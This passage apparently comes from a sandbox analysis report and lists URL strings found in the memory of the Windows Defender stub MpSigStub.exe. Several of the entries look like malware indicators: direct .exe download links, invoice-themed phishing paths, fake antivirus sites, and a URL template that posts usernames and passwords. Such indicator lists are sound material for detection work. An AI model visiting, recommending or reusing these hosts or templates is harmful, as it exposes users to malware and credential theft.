Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/navhtm/nav
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/tools/#
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://www.77169.net/
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.7sponsor.com/
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.887766.com/hi.htm
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&lev
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.96333.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.9aaa.com
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.DanlodBazar.blogfa.com
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://www.IM-Names.com/names
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://www.IM-Names.com/namesa
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp String found in binary or memory: http://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp String found in binary or memory: http://www.LuckyAcePoker.com/install
Source: MpSigStub.exe, 00000023.00000003.18300098662.0000015B1C3F4000.00000004.00000001.sdmp String found in binary or memory: http://www.MalwareAlarm.com/
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.PCKeeper.com
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://www.PlanetCpp.com
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.PriceFountain.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://www.Social2Search.com/privacy
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.activision.com/games/wolfenstein/purchase.html
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.adserver.com
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.advgoogle.blogdpot.com
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://www.agendagyn.com/media/fotos/2010/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.airmak.it/information.rar
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.ajanster.com/zuppe/
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: http://www.alanga.net/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.aldimarche.eu/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.alexa.com
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.alibaba.com
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.allatori.com
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.alot.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.alphadecimal.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.altayusa.com/ssl/js/prototype.js
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://www.alxup.com/bin/Up.ini
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.amazon.com
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.amentosx.com/script/r.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.andrewkarpie.com/sweat/secure/serve.php?protect=noefort)
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.antivirusxp2008.com
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/license-
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.appkyc6666.cn
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.apple.com
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.applicablebeam.com/ddawdew/trjgje.exe
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.ardamax.com
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.ardamax.com/keylogger/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://www.arfa.it/rechnung/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.asame.org/includes/js/dtree/img/474/mamb/pdf/pdf.htm)
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.asianraw.com/members/vs.html
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://www.ateliedeervas.com.br/scan/
Source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp String found in binary or memory: http://www.avpro-labs.com/buy.html
Source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp String found in binary or memory: http://www.avpro-labs.com/buy.htmlx
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.cn/baidu?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.cn/s?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/baidu?
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/baidu?tn=
Source: MpSigStub.exe, 00000023.00000003.18351150877.0000015B1B40C000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/cpro.php?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://www.beidou123.cn/count.asp
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.bin32.com/check?id=1&ver=16
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://www.bitly.com/yeuiqwbdhasdvbhsagdhj%public%
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.blazehits.net/popup.
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.blazingtools.com
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.bliao.com/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.blizzard.com/support/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.blue-series.de
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.bluelook.es/bvvtbbh.php
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://www.bobozim.hpg.com.br/nohot.jpg
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.bokee.com/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.bonusesfound.ml/install/inst64.exe
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.bonusesfound.ml/update/index.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://www.boot-land.net/
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.boukan.8m.net/AYO_Soft/Index.html
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.britishtotty.com/content/homepage.html
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.browserwise.com/d
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://www.busnuansa.my.id/pboojfzdzpub/8888888.png
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.cakedan.com/
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/install.php?
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/search/search.php
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/search/search.phpx
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://www.ccleaner.com
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.ccnnic.com/download/
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://www.cepdep.org/csslb/graphics/outlines/registro-cita.php
Source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.charlesboyer.it/invoice-for
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.cheathappens.com/unauthorized/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://www.chmeditor.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.cinderella-movie.com/regist1.php?s=2&d=14&f=01
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.ckplayer.comutf-8
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.cleveradds.com/
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.cmbchina.com/
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.cmfu.com/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.cnn.com
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.coapr13south.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.coapr13south.com/download.php?xe
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://www.codylindley.com)
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojulyfastdl.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojulyfastdl.com/download.php?x
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojune13coast.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.comar13west.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.comay13north.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.comay15coat.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: http://www.comegoto.com/host.jpg
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://www.comfm.com
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://www.comfm.comx;
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.commonname.com/find.asp?cn=
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://www.constructed.fi/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooct13hen.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooctdlfast.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooctdlfast.com/download.php?x
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.copy9.com
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept13jetty.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://www.cow-shop.nl/index4.html
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://www.crl-lhk.eus/bbvnoti/530340.png
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.ctuser.net
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://www.cultravel.it/invoice-number-
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.dandownload.com/
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.dangdang.com/
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.darxk.com/aviatic/systema.exe
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.daybt.com/query.asp?q=%s
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.dealply.com/faq/
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp String found in binary or memory: http://www.default-search.net/search?sid=
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.defence.gov.au/pki0
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://www.delta-homes.com/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.desh-datenservice.de/ups-view/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.dialerclub.com
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: http://www.diannaowang.com:8080
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.dianping.com/
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.diaochapai.com/survey/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.digitrends.co.ke/invoice/
Source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.distance24.org/route.json?stops=
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.dnangels.net/q2q/qqlong.asp
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.down988.cn/2.htm?021width=0height=0
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://www.dsdsd.com/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.dutty.de/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.easypoint.kr/cashback/config.php
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.ebay.com
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.elec-tb.com/tmp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.empressdynasty.com/invoice-number-51356/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.en100wan.com/google.htmwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://www.enerjisampiyonaku.com/logs/form.php
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.epoolstroi.ru/templates/im-start/css/fonts/canada%20post%20notice%20card.zip
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.esaof.edu.pt/templates/beez/images_general/xml/xiqueyhayudhxzzc.exe
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.exit7.net/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: http://www.f2ko.de
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.fakhfouri.com/sales-invoice/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.fastclick.com
